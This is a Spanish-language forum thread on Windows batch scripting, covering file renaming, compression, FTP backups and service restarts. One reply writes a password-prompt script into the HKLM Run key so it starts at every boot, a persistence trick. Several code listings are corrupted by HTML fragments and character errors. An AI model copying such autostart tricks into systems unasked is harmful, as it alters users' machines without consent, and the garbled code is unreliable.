la primera parte del echo es el nombre del archivo original para esa iteracion (%%j %%k) y la segunda parte(%Historia%_%Ojo%_%contador%_%%i.txt) como deberia quedar despues del renombrado

que os parece?

gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 7 Mayo 2010, 23:00

Dentro de los ciclos FOR, siempre debes de tratar las variables con los caracteres !!

Prueba así: Código

```
11.
12.
      :data
13.
14.
15.
      set /p Historia=Escriba el numero de historia:
16.
17.
      set /p Ojo=Escriba el tipo de ojo:
18.
19.
                       echo
20.
      echo
                        Los datos son correctos?
                        Numero de historia: %Historia%
21.
      echo
22.
      echo
                        Tipo de ojo: %0jo%
23.
                       echo
24.
25.
      set /p respuesta=1 es Si, 2 es NO:
26.
27.
      if %respuesta% EQU 1 (goto :renombrar) else (goto :data)
28.
29.
30.
31.
32.
     :renombrar
      set contador=0
33.
34.
35.
36.
      <u>for</u> /F "tokens=1,4*" %%i <u>in</u> ('<u>dir</u>') <u>do</u> (
37.
                              set /a contador=!contador!+1
38.
39.
                            echo %%j %%k !Historia! %<span<
  span="" style="color: black !important;"> style="color:
  #448888;">Ojo</span<>% !contador! %%<span< span=""
  style="color: black !important;"> style="color:
  #448888;">i</span<>.txt
40.
41.
42.
43.
     pause
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: robrey26604 en 31 Mayo 2010, 22:16

Tengo el siguiente código para encontrar y borrar farchivos que no se pueden borrar porque quedaron enganchados Código: Código

```
1. @echo off
2. echo Este programa borra archivos que no se dejan borrar
    porque
3. echo quedaron enganchados,por ejemplo videos, etc.
4. set /p archivo="Nombre del Archivo>>"
5. rem Roberto Fernández Rey
6. for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y
    z) do (
7. dir /b %%i:\ > nul 2>&1 && (
8. for /f "tokens=*" %% in ('dir /b /s %%i:%archivo%') do (if
    exist %% (
9. taskkill /f /im explorer.exe && (del /f /q "%%_") && (start
    explorer.exe)))))
10. exit /b 0
11.
```

el código busca el archivo y lo elimina pero sucede que no puedo quitar la flash de F: a no ser que le aplique manualmente taskkill al explorer.exe y despues start una vez mas.

que será?

gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 31 Mayo 2010, 23:00

¿A qué te refieres con "enganchados"?

¿La flash?

¿Cómo?

Explicate mejor.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: robrey26604 en 1 Junio 2010, 14:31

Gracias Leo por tu tiempo y ayuda.

Me refiero a enganchado a que cuando traté de liberar la flash para desconectarla de forma segura, me indicó que estaba un proceso en curso en ella y por eso no podia ser liberada y que tenia que ver con el explorer. Pienso que puede ser un problema de tiempo, que al aplicar taskkill y no dar un tiempo para eso puede provocar problemas, mi máquina no es muy rápida que digamos, esa es una idea mia pero no estoy seguro de este razonamiento. Cuando le di taskkill, manualmente y start al explorer (manualmente) el proceso terminó y pude sacar la flash. El video que queria borrar estaba en el disco duro y en la flash.

Gracias.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 11 Junio 2010, 20:58

Pueden ser muchas cosas, desde el explorador que esté usando la memoria, o simplemente te encuentres con CD o chdir en la memoria.

Coloca el código.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: FJPPitta en 15 Julio 2010, 18:47

Hola que tal,

estaba revisando el post ya que estoy haciendo un batch para comprimir archivos con el 7zip d forma que me comprima cada documento en un archivo .7z separado, el caso es que tengo el problema que el nombre de archivo lo arrastra con la extension, si tengo:

documento.doc

le aplico el batch y queda

documendo.doc.7z

como puedo quitar el .doc del comprimido, para comprimir uso:

Código:

```
for %%a in (*.wad) do "%MYFILES%\7z.exe" a -t7z "%%a".7z "%%a" -mx9 -bd
```

vi que en un ejemplo pueden quitar lo ultimos 3 caracteres de una variable pero no me funciona, saben como podria hacerle ya sea en esa linea o despues de la ejecución del comando.

Tambien quisiera saber si es posible agregar un log de tiempo a cada archivo comprimido para que dentro de mi 7z tenga documento.doc y fecha.log, el .log creado al momento de la ejecución del .bat

De antemano gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 15 Julio 2010, 21:20

Intenta así:

Código

```
    for %%a in (*.wad) do (
    "%MYFILES%\7z.exe" a -t7z "%%~na".7z "%%a" -mx9 -bd
    )
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: FJPPitta en 15 Julio 2010, 21:48

Muchas gracias Leo Gutierrez funciona a la perfección habia intentado ponerle el ~n pero lo hacia %%a~n por eso no quedaba.

Que buena solución

Saludos y buen día

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: FJPPitta en 20 Julio 2010, 23:55

Ya entrando en mas detalles tengo una duda que me inquieta, es posible hacer un barrido de letra por letra del nombre de un fichero algo así como que de un archivo abcd.txt me indique las letras exisentes a b c d y pueda hacer un cambio similar a a=1, b=2 c=3 d=4 y luego renombrar automaticamente a 1234.txt o si el archivo se llama bcda.txt se renombre a 2341.txt

Saludos y gracias por la información del post, ha sido realmente muy valiosa para automatizar algunas de mis tareas diarias.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 21 Julio 2010, 01:25

Cita de: FJPPitta en 20 Julio 2010, 23:55

Ya entrando en mas detalles tengo una duda que me inquieta, es posible hacer un barrido de letra por letra del nombre de un fichero algo así como que de un archivo abcd.txt me indique las letras exisentes a b c d y pueda hacer un cambio similar a a=1, b=2 c=3 d=4 y luego renombrar automaticamente a 1234.txt o si el archivo se llama bcda.txt se renombre a 2341.txt

Saludos y gracias por la información del post, ha sido realmente muy valiosa para automatizar algunas de mis tareas diarias.

code.bat Código

```
1. @echo off
2. setlocal enabledelayedexpansion
3. rem Checar si el usuario usó bien el .bat
4. if ["%1"]==[""] (
       echo Error con argumentos.
6.
       exit /b 1
7.)
8. rem Checar si el archivo existe:
9. if not exist "%1" (exit /b 1)
10.
       set "word=%~n1";
11.
       set "temp=%word%";
12.
       rem Calcular la longitud de cadena y almacenarlo en una
  variable
13.
       set /a contador=0
14.
      :loop
15.
               if not defined word (goto:end)
               set "word=%word:~1%";
16.
17.
               set /a contador+=1
18.
               goto:loop
```

```
19.
               end
        20.
                       set /a contador-=1
                       set "final=";
        21.
        22.
                       for /1 %% in (0, 1, %contador%) do (
                               call:alpha !temp:~%<span< span="""</pre>
        23.
           style="color: black !important;"> style="color:
           #448888;"></span<>% , 1!
        24.
                               set "final=!final!!alpha!";
        25.
        26.
                       ren "%1" "%final%.txt"
                       goto:eof
        27.
        28.
               :alpha
        29.
               set /a contador=0
        30.
               for %% <u>in</u> (
        31.
                       abcdefghijklmnopqrstuvwxy
        32.
                       ) do (
        33.
                       set /a contador+=1
                       if "%1"=="%% " (
        34.
        35.
                               set "alpha=!contador!";
        36.
                       )
        37.
        38.
               goto:eof
        39.
Código:
C:\>echo.> abcd.txt
C:\>dir /b *.txt
abcd.txt
C:\>code.bat abcd.txt
C:\>dir /b *.txt
1234.txt
C:\>
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: FJPPitta en 21 Julio 2010, 16:03

Realmente increible no pense que se pudiera hacer tanto con un batch, muchas gracias voy a examinar el codigo para enterderle, ajustarlo a mis necesidades e incluirlo en un script mas grande.

EDITO:

Fijate que no entiendo muy bien algunas partes

Aqui de una lista de numeros que va de 0 a la longitud de la cadena , entiendo que por cada posición llama a la funcion alpha para que sustituya cada letra por el numero correspondiente

lo que no entiendo es el %%_ es solo una variable como podria ser %%a?

el llamado a la funcion por que se coloca entre "!" es para que unicamente pase 1 caracter a la funcion?

y set "final=!final!!alpha!"; suma caracter por caracter para formar al final la cadena ?

```
for /l %%_ in (0, 1, %contador%) do (
  call:alpha !temp:~%%_, 1!
  set "final=!final!!alpha!";
)
```

ya todo lo demas si me queda claro ya hice pruebas y todo va perfecto.

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 21 Julio 2010, 22:10

Citar

lo que no entiendo es el %%_ es solo una variable como podria ser %%a? Así es, pude haberle puesto %%# ó %%j, pero quise %%_, es solo cuestión de gustos.

Citar

el llamado a la funcion por que se coloca entre "!" es para que unicamente pase 1 caracter a la funcion?

Sí. Se manda el carácter a la función y se hace el proceso de verificar qué posición ocupa en el alfabeto.

Citar

set "final=!final!!alpha!"; suma caracter por caracter para formar al final la cadena ? Sí, se suma o concatena.

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: FJPPitta en 21 Julio 2010, 22:42

Gracias es que entre los %% y los !! me confundia pero ya todo esta mas claro, el programa que estoy haciendo ya va tomando forma.

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: sabrita en 23 Agosto 2010, 21:14

pff la verdad yu no entiendo nada

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 24 Agosto 2010, 01:40

<u>Cita de: sabrita en 23 Agosto 2010, 21:14</u> pff la verdad yu no entiendo nada

¿pff? ¿yu?

¿Qué edad tienes, 10 años?, aprende a escribir.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: FJPPitta en 15 Septiembre 2010, 07:30

hola que tal, aqui dando lata de nuevo

¿cómo puedo guardar un argumento?

en este caso una extención especifica

archivo.bat doc

significa que realizo un proceso con todos los .doc que encuentre en el directorio realizo bien las funciones al inicio con un

```
Código:
for %%a in ("*."%1) do (instrucciones)
```

pero mas adelante ejecuto una llamada a funcion pero no puedo utilizar el %1 ya que esta asignado al primer parametro de la funcion, entonces como puedo quardarlo en una variable para usarlo dentro de mi funcion

trate con

Código:

```
set %ext=%1
set %ext%=%1
set ext=%1
```

pero me deja la variable ext vacia, tambien intente con el set /a ext=%1 y sigue estando vacia o si no me pone ext

de antemano gracias

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 15 Septiembre 2010, 19:32

No te he entendido.

¿El argumento lo pasas desde el cmd.exe?

¿O de una etiqueta a otra?

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: FJPPitta en 16 Septiembre 2010, 01:02

espera aunque despues de una cocacola ya pude pensarlo mejor :xD , lo que pasa es que no estaba asignando bien la variable la debo asignar

debe quedar así

```
Código:
set "ext=%1"
```

y luego en la linea donde ocupo la variable

```
Código:
ren "%~n1%~x1" "%temp%"."%ext%"
```

y así ya puedo almacenar un argumento y usarlo dentro de una funcion

Muchas gracias por la atención y disculpa la molestia es que llevaba un par de días dandole vueltas a esto y apenas se me prendió el foco

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: astral_153 en 1 Octubre 2010, 01:47

Cita de: astral 153 en 30 Septiembre 2010, 03:09

Es posible crear un asistente de Actualizacion automatica desde Batch?? al igual que las actualizaciones automaticas de windows, este archivo deberia descargar las actualizaciones o archivos de un servidor de internet y guardarlos en una carpeta pre determinada..

Nota: soy nuevo en batch.. Si alguien puede ayudarme con este codigo.. Gracias de antemanos.. :D

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 1 Octubre 2010, 02:33

Sí, sí se puede descargar algo desde una web, pero no con comandos nativos de Windows.

Probablemente tengas que utilizar get.exe o wget.exe, o iopus file downloader.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: astral_153 en 2 Octubre 2010, 02:05

Whooo genial funciona perfectamente ;-) con el **Wget.exe**

Gracias ;D ;-) ;-) ;-)

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Christianlej en 5 Noviembre 2010, 01:36

Hola me gustaria saber como cierro un programa "firefox.exe" en 1 minuto despues de haberlo habierto del mismo archivo bat: probe esto pero no me funciono. Y quiero que al abrir el programa con el bat se me cierre en 30 minutos automaticamente sin yo decirle nada.

@echo off
title Cerrar Programas/a
color 0b
mode con cols=80
mode con lines=6
:prog

```
cls
echo.
set /p variable2=firefox.exe (aqui pongo el programa que deseo cerrar)
:clock
echo.
set /p variable=0:34 (aqui introduzco la hora a la que quiero cerrar el
programa)
if \%time:\sim0,5\%:\%time:\sim6,2\% == \%variable\% (goto 1) else goto 2
:1
taskkill /s 127.0.0.1 /f /im %variable2%
goto ok
:2
cls
echo.
echo.
if \%time:\sim0,5\%:\%time:\sim6,2\% == \%variable\% (goto 1) else goto 2
goto 2
:ok
cls
echo.
echo Programa cerrado!!
pause=1
goto prog
```

La ayuda sera muy valorada. Gracias!! :huh:

```
Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: P3NDULO en 8 Noviembre 2010, 21:39
```

buenas, yo estoy tratando, o mejor dicho pensando en hacer un .bat.. queee.

Pueda copiar de un equipo a otro, o mejor dicho, que desde mi maquina puedo hacer una copia a varios equipos al mismo tiempo.

inicie con esto pero me perdi jijiji, esto solo lo que hace es copiar un txt en una carpeta..

@echo off

@set/p maq= Ingrese nombre de maquina:

@set/p unidad= Ingrese Letra de unidad de destino:

cd C:\Documents and Settings\COELHOF\Escritorio\nueva

dir /ad /b /on > dir.txt

for /f %%e in (dir.txt) do set user=%%e & xcopy "C:\Documents and Settings\%%e\Escritorio" "%unidad%:\%maq%\%%e\Escritorio" /E /H

/R /I /F /Y & xcopy "C:\Documents and Settings\%%e\Mis documentos" "%unidad%:\%maq%\%%e\Mis Documentos" /E /H /R /I /F /Y @Pause>Nul

y tambien, creo que por hay ley, que tenfria que ponerle el usuario de administrador de la red =)... si me pueden ayudar....

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: luis_fonde en 28 Noviembre 2010, 17:46

alguien me puede ayudar a hacer esto:

A crear un script que entre tantos nombres como queramos por paràmetro i que los muestre ordenados de menor a mayor.

gracias.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 3 Diciembre 2010, 01:53

Muestra tus avances y yo te ayudo.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: FJPPitta en 8 Diciembre 2010, 23:48

Muy bueno lo del wget.exe ya le estoy hechando un ojo así como para hacer una mini aplicación en batch y actualizarla via web.

Yo ya estoy agarrando más practica en estas cosas, con un compilador batch ya se puede hacer algo decente.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: FJPPitta en 9 Diciembre 2010, 18:14

Aqui otra vez dando lata,

Se me ha ocurrido hacer un reporte de archivos (si aquellos que alguna vez comprimí) y guardarlo en un TXT

```
Código:
    for %%a in (*.doc) do
    (
```

```
set /a archivo = "%a"
set /a contador = !contador! + 1
echo !contador! !archivo! >>reporte.txt
7z.exe a -t7z "%%~na".7z "%%~na".doc -mx9 -bd>nul
REM otros comandos . . .
```

En general es esta parte del codigo, genero un pequeño medidor de porcentaje y en la parte:

```
Código:
   echo !contador! !archivo! >>reporte.txt
```

Me guarda en el archivo solo el número de contador así, lo siguiente es las primeras letras del nombre hasta antes de un espacio

```
Código:
```

2

3

4

Trato de poner directo %~na pero no me queda en blanco ya que solo quiero poner el nombre del archivo sin extensión.

si coloco set /a nombre = %~na me dice uso del operador no valido

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 10 Diciembre 2010, 02:04

Pon el código con GeShi o eliminaré tu mensaje.

Las reglas están para algo.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: FJPPitta en 10 Diciembre 2010, 17:02

ya esta, pense que lo habia hecho pero por las prisas no le di visualizar

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: FJPPitta en 10 Diciembre 2010, 20:38

Ya encontre el fallo

debe quedar así:

```
Código:
    for %%a in (*.doc) do
    (
        set /a contador = !contador! + 1
        echo !contador! %%~na >>reporte.txt
        7z.exe a -t7z "%%~na".7z "%%~na".doc -mx9 -bd>nul
        REM otros comandos . . .
)
```

Queria almacenarlo en una variable, pero al parecer va mejor directo.

Estoy trabajando en enviar el reporte por correo electronico, apenas termine las pruebas pongo el dato por si a alguien le sirve.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: xassiz~ en 10 Diciembre 2010, 21:25

No es que vaya peor, es que te comiste un porcentaje: Código

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: FJPPitta en 10 Diciembre 2010, 23:35

Si me equivoque en la sentencia pero con:

Código:

```
set file=%%~na
```

puedo asignar el nombre de un archivo a la variable file utilizando doble porcentaje, y para guardarlo en un txt solo le puse

```
Código:
    echo !contador! : !file! >>reporte.txt
```

asi le pongo un contador y el nombre del archivo y los voy guardando :D

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: FJPPitta en 14 Diciembre 2010, 21:20

Tengo una duda, de una lista de archivos es posible cuyos nombres en ocasiones se incluyen caracteres como un! e posible localizar dichos archivos y renombrarlos cambiando el! por un espacio o cualquier otra cosa?

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: xassiz~ en 14 Diciembre 2010, 22:05

Código

```
1. @echo off
3. set "archivo=test!.txt"
5. set/a contador=0
6.
7. :loop
8. call set letra=%%archivo:~%contador%,1%%
9. if "%letra%"=="!" (set boolean=true)
10.
       set/a contador+=1
11.
       if defined letra (goto:loop)
12.
13.
       if "%boolean%"=="true" (echo:rename %archivo%
  %archivo:!=%) else (echo:No tiene !)
14.
15.
      ><u>nul</u> pause
16.
     exit
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Edo_Degauss en 3 Enero 2011, 20:14

Saludos a todo tengo una duda en cuanto a programacion en BATCH

resulta que tengo que hacer una rutina que la tengo lista pero no se como terminar lo ultimo que me queda.

La 1era parte consiste en que el batch hace un BACK UP de la base de datos y me la comprime ..

La 2da parte la sube a un FTP

Pero necesito que todo esto se haga en uno solo , osea termina de comprimir el Backup y lo empieze a subir al FTP

el problema que tengo es que despues de que hace el back up y empieza a comprimir se ejecuta y empieza a subirse, por ende error por que todavia no termina la compresion y se ejecuta la uplodeada..

el codigo que tengo es este

back up - rar

```
set FECHA= %date% set FECHA=%FECHA:/=%
```

 $SQLCMD - SEDO \setminus SQL2K8CS - E - i"C: \Users \setminus --- \setminus Desktop \setminus sql" >> "C: \Users \setminus Backup \% FECHA \%. log"$

Start winrar a -dr -ep1 "BK.rar" C:\test*.*

Sube al FTP

```
set FECHA= %date% set FECHA=%FECHA:/=%
```

ftp -s:batch-ftp.txt ftp.acquire.com.au
>> "C:\logs\details upload%FECHA%.log"

cd C:\Documents and Settings\ecabello\Desktop del "BK.rar"

habia intentado hacerlo todo desde un BAT y consegui esto call c:\Users\--\Desktop\backup.bat

:start

PING -a 127.0.0.1 > nul

:batch2

call c:\Users\--\Desktop\batch.bat

if exist "C:\test\BK.bak"

(GOTO start)

if not exist "C:\test\BK.bak"

(GOTO batch2)

Pero todavia no termina el rar y ya se ejecuta para subirlo..

mis preguntas son

Hay alguna forma de que se detecte cuando termine el rar? o de como solucionaro..

Agradeceria mucho su ayuda desde ya..

gracias de antemano

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: Germaniac en 4 Enero 2011, 06:11

Intenta usando Start con el parametro /wait Cambia

Código:

```
Start winrar a -dr -ep1 "BK.rar" C:\test\*.*

por
Código:
Start /wait winrar a -dr -ep1 "BK.rar" C:\test\*.*
```

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: aaronezpino en 3 Febrero 2011, 20:07

Hola

Necesito programar un archivo bat que me haga lo sig...
Preguntar una cadena de hora (cuatro digitos, formato HHMM), una
vez hecho esto, que renombre "archivo1" a "nombre1HHMM", "archivo2" a "nombre2HHMM".

Usé el sig código...

Código

```
    @echo off
    set /p HHMM = Escribe la hora formato HHMM
    ren C:\archivol.png %nombrelHHMM%.png
    pause
```

ya lo intenté con los sig cambios en el renglón 3.

Código:

%nombre1HHMM%.png
nombre1HHMM.png
nombre1%HHMM%.png
%nombre1HHMM.png%

y no funciona.

¿Alguien sabe como le puedo hacer?

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 3 Febrero 2011, 21:19

Primero debes decirnos de donde sacaremos los archivos "archivo1", "archivo2", etc.

¿Los da el usuario con set /p, los cogemos del directorio actual, o simplemente están seteados en el código?

Otra cosa, los código deben ir con su correspondiente etiqueta, de no ser así tu mensaje será eliminado.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: DameBanda en 27 Febrero 2011, 12:37

Hola TxShack

La respuesta a porque no fnciona es facil:

Porque si te fijas en tu code pones Código:

```
if %clave%==fark (goto bien) else goto :menu
```

me parece que para que funcionase bastaría con quitarle los 2 puntos a :menu y meterlo entre paréntesis. Para que hagas copy-paste te dejo el code de forma que funcione.

Lo que no tengo ni idea es de si se puede bloquear la X...

Código:

```
@echo off
cd c:\
echo @echo off > pass.bat
echo :menu >> pass.bat
echo echo. >> pass.bat
echo INTRODUCIR CLAVE >> pass.bat
echo echo. >> pass.bat
echo set /p clave= >> pass.bat
echo if %clave%==fark (goto bien) else goto :menu >> pass.bat
echo :bien >> pass.bat
echo cls >> pass.bat
echo echo. >> pass.bat
echo echo ACCESO VALIDADO >> pass.bat
echo echo. >> pass.bat
echo pause >> pass.bat
echo exit >> pass.bat
reg add HKLM\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run /v pass /d
C:\pass.bat
start c:\pass.bat
exit
```

Creo que así te funcionaría aunque seria mejor crear 2 archivos puesto que al introducir ciertos caracteres en un batch manda error... :-\

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 27 Febrero 2011, 17:46

Los puntos no afectan, lo que afecta es el uso o no de los paréntesis, usenlos.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: MrDJcKMC en 19 Marzo 2011, 12:10

Buenisimo!!

Será un post comenzado hace mucho, pero es muy bueno.

Gracias men!

Título: Re: -> Programación BATCH Avanzada. (nuevo)

Publicado por: imillan en 17 Mayo 2011, 16:44

Cita de: MrDJcKMC en 19 Marzo 2011, 12:10

Buenisimo!!

Será un post comenzado hace mucho, pero es muy bueno.

Gracias men!

La verdad es que si llevo una hora buscando una solución a mi tema, que no he encontrado, seguro que esta por algún sitio, pero hay tantas cosas interesantes que no puedo pasar de la pagina actual.

Bueno hay va mi pregunta.

ME gustaría saber como hacer para levantar un servicio tirado pero solo cuando lo estuviera.

Hacer algo así, pero no se como

IF NET STATUS "Jusan Server" <> 'running' THEN NET START "Jusan Server"

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 18 Mayo 2011, 04:51

Es facil, solo habría que ver qué herramienta te devuelve la lista de procesos activos.

Creo que se puede con WMIC.

Código:

wmic service list brief

Peganos la salida del comando, luego dinos cual proceso debería de aparecer.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Novlucker en 18 Mayo 2011, 05:15

Estaba viendo esto :P Código

```
1. for /f "tokens=*" %%a in ('sc query webclient | find /i /c
    "running"') do (
2. IF %%a EQU 0 (sc start webclient))
```

He puesto webclient como ejemplo.

Saludos

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: dieboxxxx en 27 Agosto 2011, 21:03

Soy nuevo en el foro y me disculpan si violo alguna regla, pero la verdad necesito con urgencia que me ayuden con ese código; necesito borrar un archivo que contenga una cadena de texto específica; ejemplo, borrar archivos .ini que contengan la palabra "MusicAlbum" en todo el disco duro, muchas gracias por su ayuda.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: Leo Gutiérrez. en 27 Agosto 2011, 21:13

Cita de: dieboxxxx en 27 Agosto 2011, 21:03

Soy nuevo en el foro y me disculpan si violo alguna regla, pero la verdad necesito con urgencia que me ayuden con ese código; necesito borrar un archivo que contenga una cadena de texto específica; ejemplo, borrar archivos .ini que contengan la palabra "MusicAlbum" en todo el disco duro, muchas gracias por su ayuda.

¿El archivo dónde se encuentra? El usuario da el archivo a borrar o se tiene que buscar antes?

Da más datos si quieres que se te ayude.

¿por qué la urgencia?

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: almacenero en 7 Noviembre 2011, 11:38

Muchísimas gracias sirdarckcat. Un tuto cojonudo.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: pablgonz en 23 Noviembre 2011, 04:11

Hola a todos, soy nuevo en el foro (lo leía pero no estaba registrado) tengo una duda habitual en la red sobre FOR y rename, pero, esta es para una cadena de archivos especifica (la idea es hacerlo con la linea de comando y no con programas externos) va así, estoy dentros del directorio temp, y en el hay un sub directorio imágenes, en este directorio tengo una serie de archivos de las siguiente forma Código

```
    name-tmp-000001.ppm, name-tmp-000002.ppm, name-tmp-
000003.ppm,...
```

donde name puede ser cualquier carácter (alfanumérico,_,etc.) y -tmpsiempre esta presente, lo que deseo es re nombrarlos para que queden así: Código

```
1. name-tmp-1.ppm, name-tmp-2.ppm, name-tmp-3.ppm,...
```

usando FOR y rename, ¿es posible?, con una perl1linea se que puedo, pero, necesito saber como hacerlos (si es posible) desde la linea de comando, pera poder incluirlo dentro de un script.

De Antemano muchas gracias
Pablo

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 23 Noviembre 2011, 06:27

El orden importa?

Es decir,

name-tmp-000001.ppm, name-tmp-000002.ppm, name-tmp-000003.ppm,...

podría quedar:

name-tmp-3.ppm, name-tmp-5.ppm, name-tmp-1.ppm,...?

No importa que el nombre (name), no coincida con el número?

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: pablgonz en 23 Noviembre 2011, 11:06

Hola, gracias por la pronta respuesta, la verdad es que el orden importa: Código

1. name-tmp-000001.ppm, name-tmp-000002.ppm, name-tmp-000003.ppm,...

debería quedar: Código

1. name-tmp-1.ppm, name-tmp-2.ppm, name-tmp-3.ppm,...

algo como «truncar los ceros» (si es que se le puede llamar asi), otro dato 000001.ppm es una cantidad fija de números, me explico, puedes ser eso o 000099.ppm o 000999.ppm, sucesivamente, es decir, es el contador del archivo pero completado con ceros hacia la izquierda. Gracias por la respuesta, a ver si me pueden ayudar con este problema.

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 24 Noviembre 2011, 01:18

Teniendo estos archivos:

```
Código:
C:\Users\leo\batch\temp>dir /b
a-tmp-000001.ppm
b-tmp-000009.ppm
c-tmp-000006.ppm
e-tmp-000010.ppm
final.cmd
h-tmp-000004.ppm
j-tmp-000003.ppm
n-tmp-000002.ppm
otro.cmd
u-tmp-000008.ppm
x-tmp-000005.ppm
y-tmp-000007.ppm
z-tmp-000011.ppm
C:\Users\leo\batch\temp>
Luego de correr el script:
Código:
C:\Users\leo\batch\temp>final.cmd
C:\Users\leo\batch\temp>
Me queda así finalmente:
Código:
C:\Users\leo\batch\temp>dir /b
a-tmp-1.ppm
b-tmp-9.ppm
c-tmp-6.ppm
e-tmp-10.ppm
final.cmd
h-tmp-4.ppm
j-tmp-3.ppm
n-tmp-2.ppm
\verb"otro.cmd"
u-tmp-8.ppm
x-tmp-5.ppm
y-tmp-7.ppm
z-tmp-11.ppm
C:\Users\leo\batch\temp>
El script es este:
Código
        1. @echo off
        2. setlocal enabledelayedexpansion
        3. for /f "tokens=1,2,3 delims=-" %%a in ('dir /b *.ppm') do (
               set "string=%%c"
        4.
        5.
               set "string=!string:.ppm=!
```

```
    for /f "tokens=* delims=0" %%A IN ("%string%") do set string=%%A
    ren "%%a-%%b-%%c" "%%a-%%b-!string!.ppm"
    )
```

Prueba si te funciona, saludos.

Título: Re: -> Programación BATCH Avanzada. (nuevo) Publicado por: pablgonz en 24 Noviembre 2011, 02:23

Hola de nuevo, gracias por responder, lamentablemente no me funciono, va así Código

```
    C:\testv3\testv3\temp\dir /b
    cambia.cmd
    test-tmp-000001.ppm
    test-tmp-000002.ppm
    test-tmp-000003.ppm
    test-tmp-000004.ppm
    test-tmp-000005.ppm
```

luego de correr el script Código

```
1. @echo off
2. setlocal enabledelayedexpansion
3. for /f "tokens=1,2,3 delims=-" %%a in ('dir /b *.ppm') do (
4. set "string=%%c"
5. set "string=!string:.ppm=!
6. for /f "tokens=* delims=0" %%A IN ("%string%") do set string=%%A
7. ren "%%a-%%b-%%c" "%%a-%%b-!string!.ppm"
8. )
```

resulta lo siguiente Código

```
    cambia.cmd
    test-tmp-000001.ppm
    test-tmp-000002.ppm
    test-tmp-000003.ppm
```

```
    test-tmp-000004.ppm
    test-tmp-000005.ppm
```

Es decir, no efectúa el cambio indicado, quizás debí comentar que todos los ficheros tienen el mismo nombre, el cual deseo mantener, solo me interesa eliminar los ceros a la izquierda del contador, esperando su ayuda, se despide:

Pablo

Título: Re: -> Programación BATCH Avanzada. (nuevo)
Publicado por: Leo Gutiérrez. en 25 Noviembre 2011, 17:51

Perdón por la tardanza.

Creo que ya funciona, el error era que en el for interno, estaba utilizando los caracteres %% para interpolar la variable, y tenía que ser !!.

Mira:

Código:

```
C:\Users\leo\batch\temp>dir /b
final.cmd
name-tmp-000001.ppm
name-tmp-00000010.ppm
name-tmp-00000011.ppm
name-tmp-0000002.ppm
name-tmp-0000003.ppm
name-tmp-000004.ppm
name-tmp-000005.ppm
name-tmp-000006.ppm
name-tmp-0000007.ppm
name-tmp-0000008.ppm
name-tmp-0000009.ppm
otro.cmd
C:\Users\leo\batch\temp>type final.cmd
@echo off
setlocal enabledelayedexpansion
for /f "tokens=1,2,3 delims=-" %%a in ('dir /b *.ppm') do (
        set "string=%%c"
        set "string=!string:.ppm=!
        for /f "tokens=* delims=0" %%A IN ("!string!") do set string=%%A
        ren "%%a-%%b-%%c" "%%a-%%b-!string!.ppm"
C:\Users\leo\batch\temp>final.cmd
C:\Users\leo\batch\temp>dir /b
final.cmd
name-tmp-1.ppm
```

```
